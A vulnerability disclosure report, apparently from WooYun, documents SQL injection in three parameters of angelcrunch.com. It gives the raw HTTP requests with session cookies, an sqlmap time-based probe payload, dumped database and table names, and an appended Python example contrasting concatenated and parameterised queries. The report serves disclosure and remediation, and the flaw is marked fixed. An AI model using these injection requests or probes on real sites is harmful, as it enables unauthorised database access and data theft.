WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2013-12-24: Details sent to the vendor, awaiting the vendor's handling
2013-12-24: Vendor confirmed; details disclosed to the vendor only
2014-01-03: Details disclosed to core white hats and relevant domain experts
2014-01-13: Details disclosed to ordinary white hats
2014-01-23: Details disclosed to intern white hats
2014-02-07: Details disclosed to the public
Earning a bit of WB to join the crowdtesting~
There are many injectable locations. Register a user, log in, and inject with the session cookies attached. Injection point 1:
POST /home/search HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keyword=1
The POST parameter keyword is injectable. Injection point 2 (GET injection):
GET /startup/?industryid=1 HTTP/1.1
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
The GET parameter industryid is injectable. Injection point 3 (the regionid value in the request below is sqlmap's heuristic probe: if(now()=sysdate(),sleep(0),0) is repeated inside a /*' ... OR' " ... OR"*/ wrapper so that the same payload parses whether the parameter is unquoted, single-quoted or double-quoted):
GET /user/investor?p=0&regionid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.angelcrunch.com:80/
Cookie: userid=51581; wtk_userhash=855ca90dbc1618b576939ecdee181712; linkedin_oauth_sec=f9861f60-c3fe-46a9-af4d-3d321088b0c2; createstartupid=12220
Host: www.angelcrunch.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
In short, wherever there is a search function there is basically an injection.
Current database:
current database: 'angelcrunch'
Databases:
available databases [3]:
[*] angelcrunch
[*] information_schema
[*] test
Tables in the current database:
Database: angelcrunch
[75 tables]
+-------------------------+
| mc_emptoken             |
| mc_usertoken            |
| sq_dynamic              |
| sq_user                 |
| startup                 |
| tb_blog                 |
| tb_blog_reply           |
| tb_cafe                 |
| tb_cooperation_kibey    |
| tb_crowdfunding         |
| tb_demoday              |
| tb_demoday_firm         |
| tb_demoday_investor     |
| tb_demoday_signup       |
| tb_demoday_startup      |
| tb_demoday_subscription |
| tb_dict                 |
| tb_disabledemail        |
| tb_dynamic              |
| tb_dynamic_temp         |
| tb_edu_experience       |
| tb_emp                  |
| tb_emp_role             |
| tb_feedback             |
| tb_feedback_email       |
| tb_financing            |
| tb_firm                 |
| tb_industry             |
| tb_investor             |
| tb_investor_industry    |
| tb_investor_prefer      |
| tb_investor_remark      |
| tb_investor_service     |
| tb_invite               |
| tb_leadinvestor_apply   |
| tb_mail                 |
| tb_mediareport          |
| tb_msg                  |
| tb_notice               |
| tb_privilege            |
| tb_region               |
| tb_resource             |
| tb_role                 |
| tb_role_privilege       |
| tb_school               |
| tb_sns_bind             |
| tb_startup              |
| tb_startup_answer       |
| tb_startup_application  |
| tb_startup_comment      |
| tb_startup_delivery     |
| tb_startup_follow       |
| tb_startup_industry     |
| tb_startup_meeting      |
| tb_startup_milestone    |
| tb_startup_part         |
| tb_startup_remark       |
| tb_startup_setting      |
| tb_startup_sharing      |
| tb_startup_updateinfo   |
| tb_startup_viewer       |
| tb_startup_warmup       |
| tb_startup_whitelist    |
| tb_startupquestion      |
| tb_sysvar               |
| tb_test                 |
| tb_user                 |
| tb_user_dynamic         |
| tb_user_email           |
| tb_user_follow          |
| tb_user_loginlog        |
| tb_user_updateinfo      |
| tb_wechat_bind          |
| tb_wechat_show          |
| tb_work_experience      |
+-------------------------+
0x1: Do a full-site self-audit; basically nothing is filtered. 0x2: Asking for 20 rank!
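As an added illustration, not code from the report or from angelcrunch.com, the following Python/sqlite3 model shows the pattern behind the keyword and industryid findings and the fix the self-audit should apply: the concatenated queries reproduce both injections, the bound-parameter versions do not. The table name tb_startup comes from the dump above; its columns (name, industryid, regionid) and the sample rows are constructed assumptions, not the site's real schema.

```python
import sqlite3

# Constructed in-memory model. The table name tb_startup is taken from the
# dump; the columns and rows are assumptions for illustration only.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tb_startup ("
        "id INTEGER PRIMARY KEY, name TEXT, industryid INTEGER, regionid INTEGER)"
    )
    conn.executemany(
        "INSERT INTO tb_startup (name, industryid, regionid) VALUES (?, ?, ?)",
        [("alpha", 1, 10), ("beta", 2, 10), ("gamma", 1, 20), ("delta", 3, 30)],
    )
    return conn


# --- /home/search, keyword parameter (quoted string context) -------------

def search_vulnerable(conn, keyword):
    """String concatenation: the keyword becomes part of the SQL text, so a
    quote in the input closes the literal and the rest is parsed as SQL."""
    sql = "SELECT name FROM tb_startup WHERE name LIKE '%" + keyword + "%'"
    return sorted(r[0] for r in conn.execute(sql))


def search_fixed(conn, keyword):
    """Bound parameter. LIKE wildcards in the input are escaped as well, so a
    caller cannot widen the pattern with '%' or '_' (not injection, but the
    same class of untrusted-input-in-query problem)."""
    escaped = (keyword.replace("\\", "\\\\")
                      .replace("%", "\\%")
                      .replace("_", "\\_"))
    sql = "SELECT name FROM tb_startup WHERE name LIKE ? ESCAPE '\\'"
    return sorted(r[0] for r in conn.execute(sql, ("%" + escaped + "%",)))


# --- /startup/?industryid=..., numeric parameter (unquoted context) ------

def by_industry_vulnerable(conn, industryid):
    """No quotes around the value, so no quote is needed to break out:
    '1 OR 1=1' is valid SQL as-is."""
    sql = "SELECT name FROM tb_startup WHERE industryid=" + industryid
    return sorted(r[0] for r in conn.execute(sql))


def by_industry_fixed(conn, industryid):
    """Validate the type first, then bind the integer."""
    try:
        value = int(industryid)
    except ValueError:
        return []  # a real handler would reject the request (HTTP 400)
    sql = "SELECT name FROM tb_startup WHERE industryid=?"
    return sorted(r[0] for r in conn.execute(sql, (value,)))


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"
    print("vulnerable search:", search_vulnerable(db, tautology))    # every row
    print("fixed search:     ", search_fixed(db, tautology))         # no rows
    print("vulnerable filter:", by_industry_vulnerable(db, "1 OR 1=1"))
    print("fixed filter:     ", by_industry_fixed(db, "1 OR 1=1"))
```

The vulnerable search turns `' OR '1'='1` into `WHERE name LIKE '%' OR '1'='1%'`, which matches every row; the bound version searches for that literal string and returns nothing. For the numeric filter the lesson is that "no quotes in the input" is no protection: the fix is type validation plus binding, not quote filtering.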
Severity: High
Vulnerability Rank: 20
Confirmed at: 2013-12-24 17:25
The issue is being fixed...
2013-12-25: Issue fixed